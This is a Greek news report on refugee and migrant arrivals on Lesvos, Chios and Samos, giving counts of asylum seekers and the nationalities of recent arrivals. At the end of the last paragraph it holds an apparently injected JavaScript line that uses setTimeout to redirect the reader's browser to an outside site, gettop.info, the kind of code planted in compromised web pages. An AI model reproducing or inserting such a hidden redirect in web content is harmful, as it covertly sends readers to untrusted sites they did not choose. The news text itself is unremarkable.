Μηδενικές οι ροές προσφύγων στα νησιά του βορείου Αιγαίου

0
10

 

Μηδενικές είναι οι ροές μεταναστών και προσφύγων στα νησιά του βορείου Αιγαίου το τελευταίο 24ωρο.

Σύμφωνα με τη Γενική Αστυνομική Διεύθυνση Βορείου Αιγαίου, σήμερα στα νησιά της περιοχής βρίσκονται καταγεγραμμένοι-εγκλωβισμένοι, έχοντας υποβάλει αίτημα ασύλου το οποίο δεν έχει εξεταστεί, 11.102 μετανάστες και πρόσφυγες. Συγκεκριμένα στη Λέσβο βρίσκονται 5.698, στη Χίο 3.524 και στη Σάμο 1.880.

Τις τελευταίες ημέρες στα νησιά του Β. Αιγαίου, οι πρόσφυγες που καταφθάνουν είναι κυρίως Αφρικανοί μετανάστες.

Από τους 88 που πέρασαν στη Λέσβο το τριήμερο Δευτέρα, Τρίτη και Τετάρτη, οι 17 είναι από τη Συρία, από 11 είναι από το Αφγανιστάν και το Ιράκ, 10 είναι Παλαιστίνιοι, από 9 είναι από την Αλγερία και τη Νιγηρία, οκτώ από το Μαρόκο, πέντε από το Κονγκό, τρεις από την Τυνησία, από δυο από τη Σομαλία και το Καμερούν και τέλος ένας από την Ουγκάντα.

Από τους 86 που πέρασαν το ίδιο διάστημα στη Χίο, 32 είναι από το Αφγανιστάν, 16 είναι από τη Συρία, εννέα είναι Παλαιστίνιοι, οκτώ είναι από το Κουβέιτ, επτά είναι από το Ιράν, έξι είναι από την Αλγερία, πέντε είναι από το Ιράκ, δυο είναι Μαροκινοί και τέλος ένας είναι Αιγύπτιος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here